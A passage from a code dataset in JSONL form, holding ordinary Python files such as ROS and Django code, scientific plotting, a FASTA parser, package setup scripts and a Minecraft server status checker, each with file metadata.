cv2.COLOR_BGR2HSV)\n # Red color\n low_red = np.array([161, 155, 84])\n high_red = np.array([179, 255, 255])\n red_mask = cv2.inRange(hsv_frame, low_red, high_red)\n hsv_red_output = cv2.bitwise_and(cv_image, cv_image, mask=red_mask)\n\n cv2.imshow(\"Image window hsv\", hsv_red_output)\n\n mask = cv2.inRange(cv_image, lowerRedBoundary, upperRedBoundary)\n output = cv2.bitwise_and(cv_image, cv_image, mask = mask)\n\n cv2.imshow(\"Image window1\", cv_image)\n cv2.imshow(\"Image window\", output)\n cv2.waitKey(1)\n \n\ndef twotopic_sub():\n rospy.init_node('2topicsub', anonymous=True)\n mode_sub = message_filters.Subscriber('scan', LaserScan)\n penalty_sub = message_filters.Subscriber('/camera/image/compressed', CompressedImage)\n\n ts = message_filters.ApproximateTimeSynchronizer([mode_sub, penalty_sub], 10, 0.1, allow_headerless=True)\n ts.registerCallback(callback)\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n twotopic_sub()\n except rospy.ROSInterruptException:\n pass","sub_path":"scripts/2topics_subscriber.py","file_name":"2topics_subscriber.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"84070018","text":"from rest_framework import serializers\r\nfrom ..p_models.color_model import ColorModel\r\n\r\nclass ColorSerilizer(serializers.ModelSerializer):\r\n class Meta:\r\n model = ColorModel\r\n fields = ('id', 'color', 'code')\r\n \r\n def validate(self, data):\r\n if data.get('color'):\r\n data['code'] = data.get('color', '').replace(\" \", \"_\").upper()\r\n else:\r\n raise serializers.ValidationError(\"Color is required\")\r\n return data\r\n\r\n def create(self, validated_data): \r\n ## Role data \r\n color = ColorModel.objects.create(**validated_data)\r\n return color\r\n\r\n def update(self, instance, validated_data):\r\n # Update the Foo instance\r\n instance.color = validated_data.get('color', instance.color) \r\n instance.code = validated_data.get('code', instance.code) \r\n instance.save() \r\n return instance","sub_path":"products/p_serializers/color_serializers.py","file_name":"color_serializers.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"347312355","text":"from networktables import NetworkTablesInstance\nfrom networktables import NetworkTables\n\ndef publishNumber(MergeVisionPipeLineTableName, name, value):\n #start NetworkTables\n ntinst = NetworkTablesInstance.getDefault()\n # Name of network table - this is how it communicates with robot. IMPORTANT\n networkTable = NetworkTables.getTable(MergeVisionPipeLineTableName)\n networkTable.putNumber(name, value)\n #print(name+ \": \" + str(value))\n\ndef publishString(NetworkTableName,name, Strvalue):\n #start NetworkTables\n ntinst = NetworkTablesInstance.getDefault()\n # Name of network table - this is how it communicates with robot. IMPORTANT\n networkTable = NetworkTables.getTable(NetworkTableName)\n networkTable.putString(name, Strvalue)\n #print(name+ \": \" + str(value)) ","sub_path":"NetworkTablePublisher.py","file_name":"NetworkTablePublisher.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"117628409","text":"import sqlite3\n\ndbname = \"test.db\"\n\n\ndef createTables():\n \"\"\"\n 读取tableList,自动为数据库建表\n \"\"\"\n with sqlite3.connect(dbname) as conn:\n with open(\"tableList.txt\", \"r\", encoding=\"utf-8\") as ftable:\n for baseName in ftable:\n # 拼接表名\n tableName = baseName.replace(\"\\n\", \"\")\n with open(tableName+\".sql\", \"r\", encoding=\"utf-8\") as fsql:\n sql = fsql.read()\n conn.execute(sql)\n\n\nif __name__ == \"__main__\":\n createTables()\n print(\"---end---\")\n","sub_path":"PythonDemo/Day08/02initdb.py","file_name":"02initdb.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"37261307","text":"from collections import Counter\n\n\"\"\"\ninput: \n10\n2 3 4 5 6 8 7 6 5 18\n6\n6 55\n6 45\n6 55\n4 40\n18 60\n10 50\n\"\"\"\nif __name__ == \"__main__\":\n _ = input()\n count = Counter(list(map(int, input().split())))\n no_of_customers = int(input())\n res = 0\n for _ in range(no_of_customers):\n line = list(map(int, input().split()))\n if count[line[0]] != 0:\n res += line[1]\n count[line[0]] -= 1\n print(res)\n","sub_path":"collections_counter().py","file_name":"collections_counter().py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"546238544","text":"from setuptools import find_packages\nfrom setuptools import setup\n\nPYTEST_VERSION_ = '3.3.0'\n\nsetup(name='audiomate',\n version='2.0.0',\n description='Audiomate is a library for working with audio datasets.',\n long_description='Audiomate is a library for easy access to audio datasets. '\n 'It provides the datastructures for accessing/loading different datasets in a generic way. '\n 'This should ease the use of audio datasets for example for machine learning tasks.',\n url='https://github.com/ynop/audiomate',\n download_url='https://github.com/ynop/audiomate/releases',\n author='Matthias Buechi, Andreas Ahlenstorf',\n author_email='buec@zhaw.ch',\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3 :: Only',\n 'Topic :: Scientific/Engineering :: Human Machine Interfaces'\n ],\n keywords='audio music sound corpus dataset',\n license='MIT',\n packages=find_packages(exclude=['tests']),\n install_requires=[\n 'audioread >= 2.1.0',\n 'numpy >= 1.14.0',\n 'scipy >= 1.1.0',\n 'librosa >= 0.6.0',\n 'h5py >= 2.7.1',\n 'networkx >= 2.0',\n 'beautifulsoup4 >= 4.6.0',\n 'lxml >= 4.1.1',\n 'requests >= 2.18.4'\n ],\n include_package_data=True,\n zip_safe=False,\n test_suite='tests',\n extras_require={\n 'dev': [\n 'click==6.7',\n 'pytest==%s' % (PYTEST_VERSION_,),\n 'pytest-runner==3.0',\n 'pytest-cov==2.5.1',\n 'requests_mock==1.4.0',\n 'Sphinx==1.6.5',\n 'sphinx-rtd-theme==0.2.5b1'\n ],\n 'ci': ['flake8==3.5.0', 'flake8-quotes==0.12.1'],\n },\n setup_requires=['pytest-runner'],\n tests_require=[\n 'pytest==%s' % (PYTEST_VERSION_,),\n 'requests_mock==1.4.0'\n ],\n entry_points={\n }\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262346634","text":"\"\"\"\n给定一个整数数组 nums,其中恰好有两个元素只出现一次,其余所有元素均出现两次。\n找出只出现一次的那两个元素。你可以按 任意顺序 返回答案。\n\"\"\"\n\n\ndef singleNumber2(nums):\n e1 = 0\n e2 = 0\n\n for e in nums:\n e1 ^= e\n\n rightOne = e1 & (~e1 + 1)\n\n for e in nums:\n if e & rightOne != 0:\n e2 ^= e\n\n return [e2, e1 ^ e2]","sub_path":"BitOperation/singleNum2.py","file_name":"singleNum2.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"528110114","text":"from typing import Tuple\n\nfrom gol.models import Task\nfrom gol.common import Grid, Reporter\nfrom gol.rules_parser import parse\nfrom .common import Ok, Score, Rules, tick, validate_grid_colors, \\\n validate_grid_size\n\n\ndef _red_top_count(grid: Grid):\n return grid[0].count('r')\n\n\n@validate_grid_colors\n@validate_grid_size\ndef eval_line_coloring(task: Task, rules: Rules, grid: Grid,\n int_reporter: Reporter,\n user_reporter: Reporter) -> Tuple[Ok, Score]:\n rules = parse(task.rules, task.allowed_colors)\n\n for y in range(grid.height-1):\n for x in range(grid.width):\n if grid[y][x] != 'b':\n user_reporter('[ERR] Obarvili jste víc, než jen spodní řádek!')\n return (False, 0)\n\n for i in range(11):\n grid = tick(grid, rules, task.global_config())\n int_reporter(f'[OK] Po {i+1}. krocích v horním řádku '\n f'{_red_top_count(grid)} červených buňek.')\n\n score = _red_top_count(grid)\n user_reporter(f'[OK] Počet červených buňek v horním řádku po 11. kroku:'\n f' {score}.')\n return (True, score)\n","sub_path":"gol/evaluators/line_coloring.py","file_name":"line_coloring.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"459934642","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 28 16:51:33 2018\r\n\r\n@author: zdenek\r\n\"\"\"\r\n\r\ndef remap_values(all_possible_values, old_positions):\r\n old_map = all_possible_values\r\n old_map_unique = np.unique(old_map) \r\n new_map_unique = np.arange(len(old_map_unique))\r\n \r\n new_positions = []\r\n for p in old_positions:\r\n new_positions.append(new_map_unique[ np.where(old_map_unique == p )][0])\r\n return old_map_unique, new_map_unique, new_positions \r\n\r\n\r\n\r\nplt.ioff()\r\nprint('\\nGenerating p_diff graphs')\r\nos.makedirs( '{}/{}/{}'.format(cwd, results_dir, p_diff_graphs), exist_ok=True)\r\n\r\nsamples = sorted([ a for a in result_frame['sample'].unique() ])\r\nfor sample in samples:\r\n next_frame = result_frame[result_frame['sample'] == sample]\r\n pressures = sorted([ a for a in next_frame['pressure'].unique() ])\r\n for pressure in pressures:\r\n next_frame2 = next_frame[next_frame['pressure'] == pressure] \r\n voltages = sorted([ a for a in next_frame2['voltage'].unique()])\r\n for voltage in voltages: \r\n last_frame = next_frame2[next_frame2['voltage'] == voltage]\r\n \r\n p_diff_color_map.reset() \r\n plt.figure()\r\n last_frame = last_frame.sort_values(by='temperature') \r\n\r\n xt = np.arange(len(last_frame.temperature.unique()))\r\n\r\n\r\n\r\n all_possible_x_values = np.array(last_frame.temperature.tolist()+ [-8,-5,0,10,22,40]) \r\n \r\n old_map_unique, new_map_unique, new_X_positions = remap_values(all_possible_x_values, last_frame.temperature)\r\n\r\n \r\n\r\n\r\n plt.plot(new_X_positions, last_frame.pDiff, color= p_diff_color_map.get_color(False), lw = 1, marker = 'o', label = '')\r\n fplot.add_label('p_diff', p_diff_color_map.get_color(True), marker = 'o' ) \r\n \r\n for msp, msp_cor, msp_cor_new, temp, pDiff in zip(last_frame.valid_MSP_rate, last_frame.valid_msp_rate_cor,last_frame.valid_msp_rate_cor2, new_X_positions, last_frame.pDiff ):\r\n print(msp, msp_cor, msp_cor_new, temp, pDiff)\r\n plt.annotate(\"{} \\n {} \\n {}\".format(msp, msp_cor, msp_cor_new), [temp, pDiff], fontsize = 16, fontweight='bold', color='red')\r\n\r\n plt.plot(new_X_positions, last_frame.pDiff_BMP, color = p_diff_color_map.get_color(False), lw = 1, marker = 'o', label = '')\r\n fplot.add_label('p_BMP', p_diff_color_map.get_color(True), marker = 'o' ) \r\n \r\n plt.plot(new_X_positions, last_frame.pDiff_MSP, color = p_diff_color_map.get_color(False), lw = 1, marker = 'o', label = '')\r\n fplot.add_label('p_MSP', p_diff_color_map.get_color(True), marker = 'o' ) \r\n\r\n old_positions = [-8,-5,0,10,22,40]\r\n old_map_unique, new_map_unique, new_X_positions = remap_values(all_possible_x_values, [-8,-5,0,10,22,40])\r\n\r\n plt.plot(new_X_positions, [-700,-700,-700,-700,-500,-700], 'k', ls = '--')\r\n plt.plot(new_X_positions, [ 700, 700, 700, 700, 500, 700], 'k', ls = '--')\r\n \r\n fplot.set_plot_config('Temperature [°C]', 'Pressure [mbar]',' {}; {} bar; {} V'.format( sample, pressure/1000 ,voltage/1000), ylim = [-2000,None]) \r\n fplot.modify_ticks(list(map(str, old_map_unique)), new_map_unique, action = \"clear\", axes_type = 'x') \r\n plt.xlim(-0.3,len(new_map_unique)) \r\n plt.legend(loc = 'lower right') \r\n plt.savefig( '{}/{}/{}/{}_{}_bar_{}_V.png'.format( cwd, results_dir, p_diff_graphs, sample, pressure/1000, voltage/1000)) \r\n plt.close()\r\n","sub_path":"masked_pmm_temperatures.py","file_name":"masked_pmm_temperatures.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"375104250","text":"from __future__ import unicode_literals\n\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\n\nclass PageOpenTestCase(TestCase):\n def test_home_page_exists(self):\n url = reverse('home')\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n\n def test_about_page_exists(self):\n url = reverse('about')\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n","sub_path":"src/him_database/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405302358","text":"# Version: 2020.02.21\n#\n# MIT License\n#\n# Copyright (c) 2018 Jiankang Deng and Jia Guo\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n# pylint: disable=wildcard-import, unused-wildcard-import\n\"\"\"\nThis code file mainly comes from https://github.com/dmlc/gluon-cv/blob/master/gluoncv/model_zoo/model_zoo.py\n\"\"\"\nfrom .face_recognition import *\nfrom .face_detection import *\nfrom .face_genderage import *\n#from .face_alignment import *\n\n__all__ = ['get_model', 'get_model_list']\n\n_models = {\n 'arcface_r100_v1': arcface_r100_v1,\n #'arcface_mfn_v1': arcface_mfn_v1,\n #'arcface_outofreach_v1': arcface_outofreach_v1,\n 'retinaface_r50_v1': retinaface_r50_v1,\n 'retinaface_mnet025_v1': retinaface_mnet025_v1,\n 'retinaface_mnet025_v2': retinaface_mnet025_v2,\n 'genderage_v1': genderage_v1,\n}\n\n\ndef get_model(name, **kwargs):\n \"\"\"Returns a pre-defined model by name\n\n Parameters\n ----------\n name : str\n Name of the model.\n root : str, default '~/.insightface/models'\n Location for keeping the model parameters.\n\n Returns\n -------\n Model\n The model.\n \"\"\"\n name = name.lower()\n if name not in _models:\n err_str = '\"%s\" is not among the following model list:\\n\\t' % (name)\n err_str += '%s' % ('\\n\\t'.join(sorted(_models.keys())))\n raise ValueError(err_str)\n net = _models[name](**kwargs)\n return net\n\n\ndef get_model_list():\n \"\"\"Get the entire list of model names in model_zoo.\n\n Returns\n -------\n list of str\n Entire list of model names in model_zoo.\n\n \"\"\"\n return sorted(_models.keys())\n\n","sub_path":"embedding-calculator/srcext/insightface/python-package/insightface/model_zoo/model_zoo.py","file_name":"model_zoo.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"416909276","text":"__author__ = 'Carter'\nfrom django_mako_plus.controller import view_function\nfrom django import forms\nfrom django.http import HttpResponseRedirect\nimport CHF.models as cMod\nfrom django_mako_plus.controller.router import get_renderer\nfrom django.contrib.auth.decorators import permission_required\ntemplater = get_renderer('CHF')\n\n################################## INITIAL/CREATE FUNCTION #####################################\n\n@view_function\n@permission_required('CHF.manager_rights')\ndef process_request(request):\n params = {}\n\n params['products'] = cMod.Product.objects.all().order_by('name')\n params['listForm'] = EditForm()\n params['Product'] = ''\n\n if request.method == \"POST\":\n # UPDATE USER IF FORM IS VALID\n form = EditForm(request.POST)\n params['listForm'] = form\n product = cMod.Product()\n\n if form.is_valid():\n product.name = form.cleaned_data['name']\n product.description = form.cleaned_data['description']\n product.category = form.cleaned_data['category']\n product.currentPrice = form.cleaned_data['currentPrice']\n product.save()\n\n return HttpResponseRedirect('/CHF/ManageProducts')\n\n return templater.render_to_response(request, 'ManageProducts.html', params)\n\n\n################################## EDIT/ARCHIVE USER FUNCTION #####################################\n\n@view_function\ndef edit(request):\n params = {}\n\n try:\n product = cMod.Product.objects.get(id=request.urlparams[0])\n except cMod.Product.DoesNotExist:\n return HttpResponseRedirect('/CHF/ManageProducts')\n\n if request.method == 'POST':\n form = EditForm(request.POST)\n\n # DELETE PRODUCT IF ARCHIVE BUTTON WAS PRESSED\n if 'archiveButton' in request.POST:\n print(\"Archiving!\")\n product.delete()\n return HttpResponseRedirect('/CHF/ManageProducts/')\n\n # UPDATE USER IF FORM IS VALID\n if form.is_valid():\n product.name = form.cleaned_data['name']\n product.description = form.cleaned_data['description']\n product.category = form.cleaned_data['category']\n product.currentPrice = form.cleaned_data['currentPrice']\n product.save()\n\n else:\n form = EditForm(initial={\n 'name': product.name,\n 'description': product.description,\n 'currentPrice': product.currentPrice,\n 'category': product.category,\n })\n # Generate Form Data\n params['listForm'] = form\n params['Product'] = product\n\n\n # Get all user objects to populate list column\n params['products'] = cMod.Product.objects.all().order_by('name')\n\n return templater.render_to_response(request, 'ManageProducts.html', params)\n\n##################################### FORM CLASS ##############################################\n\nclass EditForm(forms.Form):\n name = forms.CharField(required=True, max_length=25)\n currentPrice = forms.CharField(required=True, max_length=25)\n category = forms.CharField(required=True, max_length=25)\n description = forms.CharField(widget=forms.Textarea)\n\n\n\n","sub_path":"CHF/CHF/views/ManageProducts.py","file_name":"ManageProducts.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"327324865","text":"from scipy.optimize import fsolve\n\nGAS_MOLAR_FRACTION = 'GAS_MOLAR_FRACTION' \nLIQUID_MOLAR_FRACTION = 'LIQUID_MOLAR_FRACTION'\n\nclass IdealBinaryMixtureFixedTemperature(object):\n '''\n '''\n def __init__(self, component_one, component_two, temperature):\n self.components = [component_one, component_two]\n self.saturation_pressures = [\n component_one.calculate_saturation_pressure(temperature),\n component_two.calculate_saturation_pressure(temperature)\n ]\n \n def calculate_saturation_pressure(\n self,\n component_one_molar_fraction,\n molar_fraction_type=GAS_MOLAR_FRACTION\n ): \n '''\n '''\n residual_function = None\n if molar_fraction_type == GAS_MOLAR_FRACTION:\n residual_function = (\n self._pressure_equation_residual_function_with_gas_molar_fraction)\n elif molar_fraction_type == LIQUID_MOLAR_FRACTION:\n residual_function = (\n self._pressure_equation_residual_function_with_liquid_molar_fraction)\n saturation_pressure = fsolve(\n func=residual_function,\n x0=self.saturation_pressures[0],\n args=(component_one_molar_fraction)\n )\n return saturation_pressure[0]\n \n def _pressure_equation_residual_function_with_gas_molar_fraction(\n self,\n pressure_guess,\n component_one_gas_molar_fraction,\n ): \n '''\n '''\n p = pressure_guess\n y_1 = component_one_gas_molar_fraction\n psat_1 = self.saturation_pressures[0]\n psat_2 = self.saturation_pressures[1]\n y_2 = 1.0 - y_1\n x_1 = y_1 * (p / psat_1)\n x_2 = 1.0 - x_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual\n \n def _pressure_equation_residual_function_with_liquid_molar_fraction(\n self,\n pressure_guess,\n component_one_liquid_molar_fraction,\n ): \n '''\n '''\n p = pressure_guess\n psat_1 = self.saturation_pressures[0]\n psat_2 = self.saturation_pressures[1]\n x_1 = component_one_liquid_molar_fraction\n x_2 = 1.0 - x_1\n y_1 = x_1 * (psat_1 / p)\n y_2 = 1.0 - y_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual","sub_path":"src/plu_diffusion/ideal_binay_mixture_fixed_temperature.py","file_name":"ideal_binay_mixture_fixed_temperature.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"321789842","text":"import json\nimport pandas as pd \nimport os \nimport sys\nimport re\nimport calendar\n\nfrom utils.loader_utils import read_jl_file, extract_details, get_resto_id, convert_date\nfrom utils.processing_utils import language_filter\n\nclass TADataLoader:\n '''\n Class used to load the data scraped from Trip Advisor using the spider \n contained in Deliverable 1. \n\n Parameters\n ----------\n data_file: str\n name of the file containing data\n data_path: str \n path to data_file\n\n Attributes\n ----------\n data_file: str\n name of the file containing data\n data_path: str \n path to data_file\n df_resto: pandas.DataFrame\n contains the restaurant information scrapped\n df_reviews: pandas.DataFrame\n contains the review information scrapped\n __dfs_built: Bool\n indicates if df_resto and df_reviews have been build\n __review_clean: Bool\n indicates if df_reviews has been cleaned\n __resto_clean: Bool\n indicates if df_resto has been cleaned\n\n '''\n def __init__(self, data_file='scrapped_data.jl', \n data_path='../Deliverable_1/TA_reviews/scrapped_data'):\n self.data_file = data_file\n self.data_path = data_path\n self.__dfs_built = False\n self.__review_clean = False\n self.__resto_clean = False\n\n def _build_df(self, ignore_duplicates=False):\n '''Builds data frames from .jl file and store them in class.'''\n data = read_jl_file(os.path.join(self.data_path,self.data_file))\n\n df = pd.DataFrame(data)\n df_restos = df[df['resto_url'].notnull()] # unique to resto\n df_reviews = df[df['review_url'].notnull()] # unique to review\n \n # check there are no duplicates\n if ignore_duplicates:\n pass\n else:\n if df_restos['resto_url'].duplicated().sum() > 0 :\n raise TypeError('Data has duplicated restaurants.')\n if df_reviews['review_url'].duplicated().sum() > 0:\n raise TypeError('Data has duplicated reviews.')\n\n df_reviews = language_filter(df_reviews, 'review_content')\n\n self.__dfs_built = True\n self.df_resto = df_restos.dropna(axis=1, how='all')\n self.df_review = df_reviews.dropna(axis=1, how='all')\n\n def _clean_review(self):\n '''Cleans self.df_reviews.'''\n # transform resto_name\n self.df_review['resto_name'] = self.df_review[\"resto_name\"].apply(\n lambda x: x[0]\n )\n # fix formatting of review likes\n self.df_review['review_likes'] = self.df_review['review_likes'].apply(\n lambda x: 0 if x is None else int(x.split(\" \")[0])\n )\n # fix formatting of user likes\n self.df_review['user_number_likes'] = (\n self.df_review['user_number_likes'].fillna(0).apply(int)\n )\n # fix formatting of user number reviews\n self.df_review['user_number_reviews'] = (\n self.df_review['user_number_reviews'].apply(int)\n )\n # fix ratings\n self.df_review['review_rating'] = (\n self.df_review['review_rating'].apply(lambda x: int(x[-2]))\n )\n # extract research ID\n self.df_review = get_resto_id(self.df_review, 'review')\n\n self.df_review['review_id'] = self.df_review['review_url'].apply(\n lambda x: re.findall(r'\\-r(\\d+)\\-', x)[0]\n )\n\n # convert review dates to datetime objects\n self.df_review = convert_date(self.df_review)\n\n # add review length\n self.df_review['review_length'] = self.df_review['review_content'].apply(\n lambda x: len(x)\n )\n\n # set bool to reflect operation was performed\n self.__review_clean = True\n\n def _clean_resto(self):\n '''Cleans self.df_resto.'''\n # transform resto_name\n self.df_resto['resto_name'] = self.df_resto['resto_name'].apply(\n lambda x: x[0]\n )\n # extract research ID\n self.df_resto = get_resto_id(self.df_resto, 'resto')\n\n # extract rating\n self.df_resto['resto_rating'] = self.df_resto['resto_rating'].apply(\n lambda rating: float(re.findall(r'([0-9]\\.[0-9])\\s', rating[0])[0])\n )\n # extract additional information\n self.df_resto = extract_details(self.df_resto)\n\n # set bool to reflect operation was performed\n self.__resto_clean = True\n \n def load_reviews(self, drop_duplicates=False):\n '''Returns data frame with review data.'''\n if not self.__dfs_built:\n if drop_duplicates:\n self._build_df(ignore_duplicates=True)\n else:\n self._build_df()\n \n if drop_duplicates:\n self.df_review.drop_duplicates(subset='review_url', inplace=True)\n\n if not self.__review_clean:\n self._clean_review()\n\n return self.df_review\n \n def load_restos(self, drop_duplicates=False):\n '''Returns data frame with restaurant data.'''\n if not self.__dfs_built:\n if drop_duplicates:\n self._build_df(ignore_duplicates=True)\n else:\n self._build_df()\n\n if drop_duplicates:\n self.df_resto.drop_duplicates(subset='resto_url', inplace=True)\n\n if not self.__resto_clean:\n self._clean_resto()\n\n return self.df_resto \n","sub_path":"Deliverable_2/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317875569","text":"#!/usr/bin/env python\n\n\"\"\"\nParse a single FASTA record from stdin and print it.\n\"\"\"\n\nimport sys\n\nclass FASTAReader( object ):\n def __init__( self, file ):\n self.file = file\n self.last_id = None\n \n def next( self ):\n if self.last_id is None:\n line = self.file.readline()\n # Verify is header line\n assert line.startswith( \">\" )\n # Extract id -- whole line\n ## identifier = line[1:].rstrip( \"\\r\\n\" )\n # Extract id -- space\n identifier = line[1:].split()[0]\n else:\n identifier = self.last_id\n\n sequences = []\n\n while True:\n line = self.file.readline().rstrip(\"\\r\\n\")\n if line.startswith( \">\" ):\n self.last_id = line[1:].split()[0]\n break\n elif line == \"\":\n sequences.append( line )\n return False, identifier, \"\".join( sequences )\n else:\n sequences.append( line )\n \n return True, identifier, \"\".join( sequences )\n \n#print identifier, \"\".join(sequences)\n \n# what I want;\n\n#reader = FASTAReader(sys.stdin)\n \n#while 1:\n# identifier, sequence=reader.next()\n# if identifier is None:\n# break\n# print identifier, sequence\n \n","sub_path":"week1-homework/fasta.py","file_name":"fasta.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599713007","text":"'''\r\nCreated on Dec 25, 2015\r\n\r\n@author: KIT1HC\r\n'''\r\n\r\ntry:\r\n from setuptools import setup\r\nexcept ImportError:\r\n from distutils.core import setup\r\n \r\n\r\nconfig = {\r\n \"description\": \"System Test Utils contains util functions for system test\",\r\n \"author\": \"Thach Kieu\",\r\n \"author_email\": \"thach.kieubuu@vn.bosch.com\",\r\n \"version\": \"0.6.4\",\r\n \"install_requires\":[],\r\n \"packages\":['src'],\r\n \"name\": \"System Test Utils\"\r\n}\r\n\r\nsetup(**config)\r\n","sub_path":"com.etas.systemtest.utils/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"50693951","text":"import os\nimport socket\nimport dateutil.parser\nfrom dateutil.tz import *\nimport json\nfrom datetime import datetime, timedelta\nimport re\nimport socket\nfrom xml.sax.saxutils import escape\nfrom canary import config\n\n__all__ = ['filename', 'check']\n\nsafename = re.compile(r'[^a-zA-Z0-9\\-.]')\nsafeport = re.compile(r'[^0-9]')\nsafemotd = {'\"': '"',\n '\\'': '''}\n\nMAX_DOMAIN_LEN = 255\n\n\ndef get_info(host, port):\n \"\"\" Get information about a Minecraft server \"\"\"\n # inspired from\n # https://gist.github.com/1209061\n # http://www.wiki.vg/Protocol#Server_List_Ping_.280xFE.29\n # http://www.wiki.vg/Server_List_Ping\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(config['TIMEOUT'])\n s.connect((host, port))\n\n s.send('\\xfe\\x01')\n d = s.recv(256)\n s.close()\n assert d[0] == '\\xff'\n\n d = d[3:].decode('utf-16be')\n\n res = {'motd': '',\n 'players': -1,\n 'max_players': -1,\n 'protocol_version': -1,\n 'server_version': ''}\n\n if d[:3] == u'\\xa7\\x31\\x00':\n # new protocol (>= 1.4)\n\n d = d[3:].split(u'\\x00')\n\n dlen = len(d)\n\n if dlen > 0:\n res['protocol_version'] = int(d[0])\n if dlen > 1:\n res['server_version'] = d[1]\n if dlen > 2:\n res['motd'] = escape(d[2], safemotd)\n if dlen > 3:\n res['players'] = int(d[3])\n if dlen > 4:\n res['max_players'] = int(d[4])\n\n else:\n # old protocol (< 1.4)\n # note some servers (modded bukkit?) seem to warn\n # about the extra \\x01 but normal servers do not.\n\n d = d.split(u'\\xa7')\n\n dlen = len(d)\n\n if dlen > 0:\n res['motd'] = escape(d[0], safemotd)\n if dlen > 1:\n res['players'] = int(d[1])\n if dlen > 2:\n res['max_players'] = int(d[2])\n\n return res\n\n\ndef clean_server(server):\n \"\"\" Get the sanitized host and port \"\"\"\n\n # add default port if necessary\n if server.find(\":\") < 0:\n server = server + \":25565\"\n\n (host, sep, port) = server.partition(\":\")\n host = safename.sub('-', host)[:MAX_DOMAIN_LEN].lower()\n port = safeport.sub('', port)\n\n return (host, port)\n\n\ndef filename(host, port):\n \"\"\" Get the filename corresponding to the server (may or may not exist) \"\"\"\n\n # note this may still generate an error if running on windows\n # since windows has a 260-char path limit\n return os.path.join(config['STORE_DIR'], \"%s(%s)\" % (host, port))\n\n\ndef check(server):\n \"\"\" Get the status of the server in a dict --\n runs a check if data is nonexistent or stale.\"\"\"\n\n needs = False # becomes True if data needs to be refreshed\n data = {'error': 'no data'} # default data\n\n (hostname, port) = clean_server(server)\n server = hostname + \":\" + port\n try:\n # try to use the IP for filename / pinging\n # to avoid breaking throttling if people\n # are using different domain names for\n # the same IP\n host = socket.gethostbyname(hostname)\n except Exception:\n host = hostname\n\n fname = filename(host, port)\n\n nowutc = datetime.now(tzutc())\n nowlocal = datetime.now(tzlocal())\n\n try:\n # load the old data if there is any\n f = open(fname, \"r\")\n data = json.load(f)\n f.close()\n\n # check staleness\n # (using default for timezone info, just in case, as old versions of canary weren't tz aware)\n last = dateutil.parser.parse(data[\"timestamp\"], default=nowlocal)\n if (last + timedelta(seconds=config['TIME_BETWEEN'])) <= nowutc:\n needs = True\n\n except (IOError, ValueError):\n # file does not exist or is malformed\n needs = True\n\n with filelock(fname + \".lock\") as fl:\n # only acquire the lock if needs is 